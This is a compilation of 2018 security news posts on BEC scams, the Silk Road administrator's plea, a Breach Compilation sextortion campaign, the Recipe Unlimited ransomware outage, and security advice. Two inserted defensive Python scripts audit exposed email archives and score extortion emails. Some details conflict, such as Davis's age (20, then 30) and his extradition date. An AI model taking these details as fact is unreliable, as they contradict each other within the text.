Group-IB’s technological leadership is built on the company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55,000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.

BEC scams, hacked accounts available from $150 up to $5,000

Security experts from Digital Shadows have conducted an interesting study of the techniques crooks adopt to infiltrate company email accounts, the so-called BEC scam.

According to the FBI, the number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

Business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018, and overall BEC/EAC losses in that period amounted to $12 billion.

Experts from Digital Shadows highlighted the availability of huge email archives online that could be used by crooks to target companies. It is quite easy to find AWS buckets containing backups of email archives online, and the same data can be found on publicly accessible rsync, FTP, SMB, and NAS drives.

The experts estimated that some 12.5 million archive files (.eml, .msg, .pst, .ost, .mbox) containing sensitive and financial information have been exposed online.

“Digital Shadows detected 33,568 email addresses of finance departments exposed through third party compromises. Eighty-three percent (27,992) of these emails had passwords associated with them. If these passwords have been reused for corporate accounts, this may leave organizations at risk to account takeovers.” reads the report published by Digital Shadows.

Experts found over 50,000 email files containing terms such as “invoice”, “payment”, or “purchase order” in misconfigured or unauthenticated file stores.

In some cases, the exposed email archives also included passport scans. According to the report, crooks search for company emails containing “ap@”, “ar@”, “accounting@”, “accountreceivable@”, “accountpayable@”, and “invoice@”.

Company credentials are a valuable commodity in the cybercrime underground; a single username and password pair is offered for up to $5,000.

BEC

The growing interest of cybercriminals in BEC scams has driven the growth of BEC-as-a-Service; such services are widely available for as little as $150.

“It’s possible to outsource this work to online actors, who will acquire company credentials for a set fee or percentage of earnings. The price will vary depending on the type of mail service, but services are available from as little as $150.” continues the report.

Experts warn that BEC is a global problem: exposed email archives were found predominantly across the European Union (5.2 million), North America (2.9 million), and Asia-Pacific (2 million).

In order to reduce the risk, Digital Shadows experts recommend the following measures to organizations:

  • Update security awareness training content to include the Business Email Compromise (BEC) scenario
  • Include BEC within incident response/business continuity planning
  • Work with wire transfer application vendors to build in manual controls, as well as multiple person authorizations to approve significant wire transfers
  • Continuously monitor for exposed credentials. This is particularly important for finance department emails
  • Conduct ongoing assessments of executives’ digital footprints – threat actors will perform their reconnaissance on high-value targets. Start with using Google Alerts to track new web content related to them
  • Prevent email archives being publicly exposed
  • Businesses should be aware of the risks of their contractors who back up their emails on Network Attached Storage (NAS) devices. Users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default.
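An audit script added here (not code from Digital Shadows or from Security Affairs) for the “prevent email archives being publicly exposed” recommendation: it walks one of your own file stores, counts the archive file types the report lists (.eml, .msg, .pst, .ost, .mbox) and flags the ones that mention the finance terms or the finance mailbox prefixes named above, so they can be removed or locked down before a share is ever exposed. The sample share it builds in a temporary directory, and every address and file in it, is constructed.

```python
import os
import re
import tempfile
from collections import Counter

# File types and search terms taken from the Digital Shadows findings described above.
ARCHIVE_EXTS = {".eml", ".msg", ".pst", ".ost", ".mbox"}
TEXT_EXTS = {".eml", ".mbox"}          # plain-text formats we can inspect in place
FINANCE_TERMS = ("invoice", "payment", "purchase order")
FINANCE_MAILBOXES = ("ap@", "ar@", "accounting@", "accountreceivable@",
                     "accountpayable@", "invoice@")


def audit_share(root):
    """Walk a file-store root and report email archives that look finance-related.

    Returns {"archives": total archive files, "by_ext": Counter per extension,
             "flagged": sorted list of (relative_path, reasons)}.
    Binary archives (.pst/.ost/.msg) are always flagged: the report counts them
    as exposed regardless of content because they cannot be inspected here."""
    archives = 0
    by_ext = Counter()
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in ARCHIVE_EXTS:
                continue
            archives += 1
            by_ext[ext] += 1
            path = os.path.join(dirpath, name)
            reasons = []
            if ext in TEXT_EXTS:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    body = fh.read().lower()
                reasons += [f"term:{t}" for t in FINANCE_TERMS if t in body]
                # Anchor the prefix so "ap@" does not match inside another local part.
                reasons += [f"mailbox:{m}" for m in FINANCE_MAILBOXES
                            if re.search(r"(^|[\s<:,])" + re.escape(m), body)]
            else:
                reasons.append("binary-archive")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                flagged.append((rel, reasons))
    return {"archives": archives, "by_ext": by_ext, "flagged": sorted(flagged)}


def build_sample_share():
    """Create a constructed sample share in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="bec_audit_")
    samples = {
        # A finance mailbox message mentioning an invoice: should be flagged.
        "backup/2018-09/msg001.eml":
            "From: vendor@example.net\nTo: ap@example.com\n"
            "Subject: Invoice 4471 due\n\nPlease see the attached invoice.\n",
        # An ordinary message: counted as an archive but not flagged.
        "backup/2018-09/msg002.eml":
            "From: hr@example.com\nTo: staff@example.com\nSubject: Picnic\n\nSee you Friday.\n",
        # An Outlook data file: binary, flagged as exposed regardless of content.
        "backup/outlook/ceo.pst": "\x00\x01binary",
        # Not an email archive at all: ignored.
        "photos/holiday.jpg": "\xff\xd8",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    report = audit_share(build_sample_share())
    print(f"{report['archives']} archive files found: {dict(report['by_ext'])}")
    for rel, reasons in report["flagged"]:
        print(f"  {rel}: {', '.join(reasons)}")
```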

Below are the key findings of the report:

  • Corporate email accounts can be compromised for as little as $150
  • A look inside the planning of a targeted Business Email Compromise campaign
  • More than 33,000 accounting email credentials are exposed
  • 12.5 million email archive files are exposed across online file stores
  • The risks of BEC can be mitigated with a range of security measures

Pierluigi Paganini

(Security Affairs – WECON, SCADA)

The post BEC scams, hacked accounts available from $150 up to $5,000 appeared first on Security Affairs.

Security Affairs

Security Affairs newsletter Round 183 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal:

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Estonia sues Gemalto for 152M euros over flaws in citizen ID cards issued by the company
·      FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP)
·      Attackers chained three bugs to breach into the Facebook platform
·      Cyber Defense Magazine – October 2018 has arrived. Enjoy it!
·      Expert demonstrated how to access contacts and photos from a locked iPhone XS
·      GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
·      Telegram CVE-2018-17780 flaw causes the leak of IP addresses when initiating calls
·      Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
·      FCA fines Tesco Bank £16.4m over 2016 cyber attack
·      Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
·      The Gazorp Azorult Builder emerged from the Dark Web
·      Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!
·      Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
·      Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
·      New Danabot Banking Malware campaign now targets banks in the U.S.
·      Researchers associated the recently discovered NOKKI Malware to North Korean APT
·      Z-LAB Report – Analyzing the GandCrab v5 ransomware
·      APT38 is behind financially motivated attacks carried out by North Korea
·      Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?
·      China planted tiny chips on US computers for cyber espionage
·      CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
·      US offers its cyber warfare defense capabilities to NATO
·      Canada blames Russia for cyber attacks against its structures
·      DHS issued an alert on attacks aimed at Managed Service Providers
·      Experts warn of a new extortion campaign based on the Breach Compilation archive
·      Sales intel firm Apollo data breach exposed more than 200 million contact records
·      US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
·      Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
·      Sony Bravia Smart TVs affected by a critical vulnerability
·      Windows 10 October 2018 Update could cause CCleaner to stop working

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 183 – News of the week appeared first on Security Affairs.

Security Affairs

Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

By Waqas

It is not happening on Dark Web but Instagram. Instagram has become much more than a platform to share your traveling, culinary, or fitness-related experiences, but a thriving portal for selling stolen accounts. Reportedly, hackers are using Instagram to sell access to botnets as well as stolen user accounts from Spotify, Fortnite and other services. […]

This is a post from HackRead.com Read the original post: Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

Silk Road Admin Pleads Guilty- Might Receive 20 Years Jail Time

By Waqas

An Irish national Gary Davis, who is also known as Libertas, has pleaded guilty to charges related to drug trafficking and is now facing up to 20 years in prison. Davis is accused of running the infamous marketplace Silk Road and served as forum moderator and site administrator while he was involved in the selling […]

This is a post from HackRead.com Read the original post: Silk Road Admin Pleads Guilty- Might Receive 20 Years Jail Time

Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.

Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace; on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.”  ” reads the DoJ press release.

Manhattan U.S. Attorney Geoffrey S. Berman said: “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity.  As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace.  Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.”

The man, who is also known as Libertas, could face a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013; for this job he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road.  From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road. ” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. “

Silk Road was seized by law enforcement in 2013 and its founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested; he was later sentenced to life in prison after being convicted on multiple counts related to Silk Road's activity.

According to the FBI, between February 2011 and July 2013, Silk Road handled $1.2 billion worth of transactions for 957,079 users; Ulbricht's total earnings were nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin, which was later sold by the authorities in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market was launched, the so-called Silk Road 2.0, and a user called Libertas was one of its administrators, but it is not clear whether the pseudonym was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014; he opposed extradition to the U.S., citing his mental health and fear for his life, and argued that extradition and consequent incarceration in the U.S. would violate his fundamental rights.

Davis was extradited to the United States in July 2014; he is expected to be sentenced on 17 January 2019 by Judge Furman.

“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge.  DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”

Pierluigi Paganini

(Security Affairs – Tor, cybercrime)

The post Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison appeared first on Security Affairs.

Don’t ever use a VPN without paying attention to these five things

By John Mason

Ryan Lin was just recently sentenced to 17 years in prison. He was sentenced for committing a range of crimes including cyberstalking, computer fraud and abuse, aggravated identity theft, and distribution of child pornography. These are all serious crimes that I in no way support or condone, but why am I particularly interested in the […]

This is a post from HackRead.com Read the original post: Don’t ever use a VPN without paying attention to these five things

EU Cyber Security Month roundup – advice on staying secure

During October, BH Consulting has been sharing daily advice about digital security and privacy on its social media channels as part of EU Cyber Security Month. This blog gathers together all of these tips into a single place. As each week goes by, we will keep adding to the content, in descending order. By the end of October, it will be a single resource for security advice you can share with colleagues or friends and family.

EU Cyber Security Month – tips from week three

Week three of EU Cyber Security Month began with a reminder about the importance of reading. Well researched, highly regarded reports like Europol’s IOCTA (internet organised crime threat assessment) and the Verizon Data Breach Investigations Report are valuable sources of intel.

Improving security culture is often a matter of taking some simple steps to improve readiness. The UK’s National Cyber Security Centre looks at 10 of these areas with a series of free guides. The advice includes making security a board-level responsibility, through to implementing secure configuration and managing user privileges to stop threats.

With threats and risks changing all the time – while your organisation also adapts and grows – it’s essential to stay on top of current best practice. Our Thursday tip reminded us that it’s always worth refreshing your knowledge of network and information security. We linked to a quick-fire quiz from the organisers of EU Cyber Security Awareness Month. Taking the quiz might identify areas where you can up your game.

Our fourth tip of the week was aimed at organisations with mature security controls. For those with confidence in their defences but wanting to improve, a red team exercise can identify possible weak points. Here’s our blog about the benefits of red teaming.

Now that we accept that security incidents can lead to business downtime, what can we do about it? We start by making the organisation resilient. This happens through agreed processes and careful preparation so that if the worst happens, the business can keep operating. BH Consulting CEO Brian Honan has spoken about this very topic, and that was our link for the final tip of the week.

EU Cyber Security Month – tips from week two

We kicked off week two of EU Cyber Security Month with a reminder that information security covers more than just data. Having a clean desk policy at work can protect important information in physical documents, as well as computers. Here’s a good sample policy developed by SANS Institute.

Our second tip of week two covers a key starting point for any good security plan. Knowing what data you hold helps in making choices about what level of protection it will need. (This is also an important part of privacy and data protection strategy, too.) We recently blogged about classifying data in this way, referring to IBM’s recent decision to ban USB storage keys.

Day three was a reminder that data breaches and security incidents are crimes. By reporting these cases to police, victims not only help with the investigation of their own incident, they also contribute valuable information to help law enforcement tackle cybercrime.

Next, we explained how digital forensics capability can help in tracing internal security incidents. Companies with the security resources in place can set up their own digital forensics lab without needing a large investment. Having an in-house lab allows security teams to carry out inquiries into everything from a security breach to HR issues.

Rounding out our advice for the week, we focused on the importance of risk assessment. This is where security and business goals meet. The key to developing solid risk assessment is to have a repeatable approach that guides your decisions. For this tip, we linked to David Prendergast’s excellent blog with advice on developing just such a risk assessment framework.

EU Cyber Security Month – tips from week one

Our first tip raised awareness of the need to prevent CEO fraud and fake invoice scams in your business. This is easy to do and doesn’t need a technical fix; it’s just a matter of changing your business processes. Anyone with access to payment systems should check with a colleague before paying money to unfamiliar accounts. Here’s a link to a recent blog we posted about this.

Tip number two covers ransomware, which is one of the most widespread security threats today. Regularly backing up your data can help you recover from a ransomware infection. You’ll find more details here.

For our third tip of the week, we looked at phishing: one of the most effective tactics in an attacker’s arsenal. One of the best investments you can make is in security awareness: train company staff to spot fake emails.

We use so many different online services and invariably, they all ask us for a password. It’s vital to use a different passphrase for each service, and a password manager, so that you log in to these services as securely as possible. Here are our tips on what to do – and not to do – when choosing a password.

For our last tip of week one, we covered data breaches. Unfortunately, they’re all too common and there seems to be a new incident on an almost weekly basis. Planning and preparation in advance of a possible breach means you’ll be ready to react if the worst happens. In today’s climate, you’ll be judged not on having suffered a breach but how well you respond to it. Here’s our advice for putting that plan in place.

Be sure to check back as we update the page throughout October. You can also catch the daily tips as they land by following BH Consulting on Twitter or on LinkedIn.

The post EU Cyber Security Month roundup – advice on staying secure appeared first on BH Consulting.

Experts warn of a new extortion campaign based on the Breach Compilation archive

Cybaze ZLab spotted a new scam campaign that is targeting some of its Italian customers; crooks leverage credentials from the Breach Compilation archive.

Security experts from Cybaze ZLab have spotted a new scam campaign that is targeting some of its Italian customers.

Crooks are attempting to monetize the huge quantity of credentials available in the underground market by targeting unaware netizens with a new extortion scheme.

The number of spam messages associated with this campaign is rapidly increasing; the attackers behind it use the credentials collected in the infamous database dubbed ‘Breach Compilation’.

The Breach Compilation archive contains about 1.4 billion clear-text credentials gathered from a series of data breaches.

At this time it is still unclear whether the attackers built a pool of email addresses for the spam campaign or are using credential stuffing to access the email accounts of unaware users and send spam messages from them.

Credential stuffing attacks use botnets to try stolen login credentials, usually obtained through phishing attacks and data breaches, against many services. This kind of attack is very effective because of users' bad habit of reusing the same password across multiple services.

The following image shows, as an example, one of the messages used in this campaign.

The message is a classic email scam in which cyber criminals threaten to reveal to the public that the victim watches porn videos. Crooks claim to have a recording of the victim watching the videos, but the claim is false.

Crooks blackmail the victims and demand the payment of a fee in Bitcoin in exchange for not spreading the video.

To be more convincing and trick victims into paying the fee, the hackers include in the body of the email a password used by the victim as proof of the compromise; this password was extracted from the Breach Compilation archive.

Experts from Cybaze have analyzed several email samples from this campaign, most of them in English. One of their customers received a scam message written in poor Italian.

Crooks ask the victims to pay a fee of $3000 worth of Bitcoin, while the message written in Italian asks for $350, a difference that suggests other threat actors are using the same technique.

The attackers may have implemented an automated mechanism to send scam emails to the addresses in the archive and to create a separate Bitcoin wallet for each of them.
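As an added example (not part of the original post or of Cybaze's analysis), a mail-filter heuristic that scores an inbound message on the traits described above: a quoted password presented as "proof", a payment demand, a recording threat and a syntactically valid Bitcoin address (Base58Check). The sample messages, the recipient addresses and the table of exposed-password hashes are constructed for this example; matching a quoted password against hashes of credentials already known to be exposed is an assumed defensive practice, not something the post describes.

```python
"""Heuristic scoring of Breach Compilation style extortion e-mails.

Added example, not code from the original post. Everything below (sample
messages, recipients, exposed-password table) is constructed for illustration.
"""
import hashlib
import re
from dataclasses import dataclass, field

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy Bitcoin addresses: 26-35 Base58 characters starting with 1 or 3.
BTC_ADDR_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")
# Phrases the scam uses to introduce the leaked password as "proof".
PASSWORD_CLAIM_RE = re.compile(
    r"(?:your\s+password|the\s+password)\s*(?:is|was|:)?\s*[\"']?([^\s\"',.]{4,})",
    re.I)
DEMAND_RE = re.compile(r"(\$\s?\d[\d,]*|\d+(?:\.\d+)?\s*(?:BTC|bitcoin))", re.I)
THREAT_RE = re.compile(r"\b(webcam|recorded|video|porn|adult)\b", re.I)

# Constructed: SHA-1 digests of passwords seen in breach dumps for our users,
# keyed by recipient address. Only digests are stored, never the plaintext.
EXPOSED_PASSWORD_HASHES = {
    "alice@example.com": {hashlib.sha1(b"Summer2017!").hexdigest()},
}


def base58check_valid(addr: str) -> bool:
    """True if addr decodes as Base58Check with a correct 4-byte checksum."""
    n = 0
    for ch in addr:
        idx = BASE58_ALPHABET.find(ch)
        if idx < 0:                      # character outside the Base58 alphabet
            return False
        n = n * 58 + idx
    # Each leading '1' encodes one 0x00 byte that the integer form drops.
    leading_zeros = len(addr) - len(addr.lstrip("1"))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    raw = b"\x00" * leading_zeros + body
    if len(raw) != 25:                   # version (1) + hash160 (20) + checksum (4)
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)
    reused_password: bool = False        # quoted password is a real exposed one


def classify(recipient: str, body: str) -> Verdict:
    """Score one message; higher means more likely a sextortion scam."""
    v = Verdict()
    addrs = [a for a in BTC_ADDR_RE.findall(body) if base58check_valid(a)]
    if addrs:
        v.score += 2
        v.reasons.append(f"valid bitcoin address {addrs[0]}")
    if DEMAND_RE.search(body):
        v.score += 1
        v.reasons.append("payment demand")
    if THREAT_RE.search(body):
        v.score += 1
        v.reasons.append("recording threat")
    m = PASSWORD_CLAIM_RE.search(body)
    if m:
        v.score += 1
        v.reasons.append("quotes a password as proof")
        digest = hashlib.sha1(m.group(1).encode()).hexdigest()
        if digest in EXPOSED_PASSWORD_HASHES.get(recipient, set()):
            # The scammer really does hold a leaked credential for this user:
            # quarantine the mail and force a reset wherever it may be reused.
            v.score += 2
            v.reused_password = True
            v.reasons.append("quoted password is a known-exposed credential; force reset")
    return v


def is_extortion(verdict: Verdict, threshold: int = 4) -> bool:
    return verdict.score >= threshold


# Constructed sample messages (the address is the well-known genesis-block one).
SCAM_SAMPLE = """Hi, I know your password is Summer2017! because I hacked your device.
I recorded you with your webcam watching adult videos. Pay $3000 in bitcoin
to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa within 24 hours or I send the video
to all your contacts."""
LEGIT_SAMPLE = """Hi Alice, the password for the shared calendar was reset yesterday.
Please pick up the new one from the IT desk. Thanks!"""

if __name__ == "__main__":
    for who, msg in (("alice@example.com", SCAM_SAMPLE), ("alice@example.com", LEGIT_SAMPLE)):
        verdict = classify(who, msg)
        print(who, verdict.score, is_extortion(verdict), verdict.reasons)
```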

Experts from Cybaze have analyzed a couple of wallets associated with the scam messages; in one case they found a number of transactions suggesting that victims made the payment.

The Bitcoin address with 9 associated transactions is 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk

It is essential to raise awareness of this campaign so that others do not fall victim to this type of extortion.

As usual, I suggest avoiding the use of the same credentials across multiple web services; you can check whether your email address has been involved in a data breach by querying the free service

https://haveibeenpwned.com/

Pierluigi Paganini

(Security Affairs – Breach Compilation, scam campaign)

The post Experts warn of a new extortion campaign based on the Breach Compilation archive appeared first on Security Affairs.

Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?

The Canadian restaurant chain Recipe Unlimited that operates over 20 restaurant brands has suffered a major IT outage over the weekend in a “malware outbreak.”

The company operates nearly 1,400 restaurants under 19 different brands in Canada.

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company confirmed that malware is the root cause of a partial network outage at nine of its franchises, including Swiss Chalet, Harvey’s, East Side Mario’s, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started its incident response procedure. A number of systems were taken offline, and all the locations infected by the ransomware were isolated from the Internet.

The affected locations continued to process card transactions manually.

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, Kelseys, Montana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to CBC News, Recipe was the victim of a ransomware attack; the outlet also shared a copy of a ransom note provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me’ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using “the strongest military algorithms”; at this time there is no information on the amount of bitcoin demanded from the victims.

The amount requested by the crooks increases over time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited denies it was the victim of a ransomware attack, saying it conducts regular system backups to promptly mitigate this kind of attack.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.

According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with Ryuk ransomware, a threat discovered by security experts at Check Point in August. At the time, the ransomware campaign targeting organizations around the world was attributed to a North Korea-linked threat actor.

The campaign appeared targeted and well planned: crooks hit several enterprises and encrypted hundreds of PCs, storage systems and data centers in each infected company.

Pierluigi Paganini

(Security Affairs – Recipe, ransomware)

The post Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack? appeared first on Security Affairs.

Hackers are holding Instagram accounts of influencers for ransom

By Waqas

The social media giant Facebook was hacked a few days ago after hackers exploited a vulnerability in its “View As” feature. As a result, 90 million users were affected but now, in another hacking spree hackers are targeting high-profile Instagram accounts and holding them for ransom – In some cases, hackers have gone one step further by […]

This is a post from HackRead.com Read the original post: Hackers are holding Instagram accounts of influencers for ransom

Plan for potential incidents and breach scenarios, cybersecurity conference hears

Businesses should prepare an incident plan for security breaches in advance to know what resources they’ll need to deal with it. Speaking at the Technology Ireland ICT Skillnet Cybercrime Conference earlier today, Brian Honan said that running different scenarios can help businesses identify whether they’ll need assistance from IT, legal, HR or public relations.

Research from the Institute of Directors in Ireland has found that 69 per cent of SMBs claim they’re prepared for a data breach. Brian flipped that statistic to point out that this means almost one third of business owners have no such plan.

Never mind cyber; it’s crime

He also encouraged companies to report incidents like ransomware, CEO fraud or a website infection. “Don’t forget you’re the victim of a crime. In most cases, a cybersecurity incident is treated as an IT problem, not even a business issue or a crime. It’s a mindset change. It’s not separate to your business, it’s integral to it.” To help make that change, he suggested: “we should drop the name ‘cyber’.”

When businesses have to disclose an incident, Brian called on them not to use the phrase ‘we suffered a sophisticated breach’ – because most times, it’s not true. In many cases, incidents are due to human error, or to bad practices like poor passwords. “If you’re using cloud email, enable two-factor authentication and educate people in using secure passwords. Encourage them not to click on suspicious links,” he said.

Other attacks exploit platforms like WordPress and Joomla. Businesses using those tools to run their websites need to continuously manage and update them, Brian said. “Many web vulnerabilities and threats, like attack types such as SQL injection, have been known about for over 10 years,” he said.

Steps to better security

Companies can take several steps to improve their security, such as establishing policies. “They’re very important – they set the strategy for the business and help everybody to meet it,” said Brian. Having systems to monitor and respond to suspicious activity is also essential. “Look at the physical world: you can’t guarantee your business won’t be burgled. It’s the same in the online world, but we need to be able to detect when it happens,” he said.

The best security investment a business can make is in awareness training for employees, Brian added. These programmes educate staff about how to identify potential attacks, and how to handle information in a secure way.

He also encouraged businesses to disclose when they have suffered an incident, to help improve overall security. “Everybody will have a breach, there’s no shame in that, so let’s get over that and share information to help each other,” he said.

Tackling the cybersecurity skills gap

Research shows a high proportion of security breaches take months to recover from, which is partly due to an industry skills shortage. “The biggest problem we have is a lack of skilled staff in cybersecurity,” Brian said. The conference saw the launch of a new programme to train 5,000 people in cybersecurity over the next three years. The Cybersecurity Skills Initiative aims to address the shortage in skilled security personnel.

It’s worth asking whether the industry is open to candidates without formal degrees in cybersecurity or computer science. Brian said some companies may need to relax restrictive HR policies such as requiring formal degrees in security or computer science to attract the right people into security roles. Otherwise, they could be missing out on enthusiastic, experienced and skilled people.

 

 

The post Plan for potential incidents and breach scenarios, cybersecurity conference hears appeared first on BH Consulting.

Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018, including our Global Awards Winners for 2018, packed with more than 75 pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro


InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to subscribe – no strings, always free emagazines:

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards have arrived – Winners are listed here:  https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!


Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.


APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

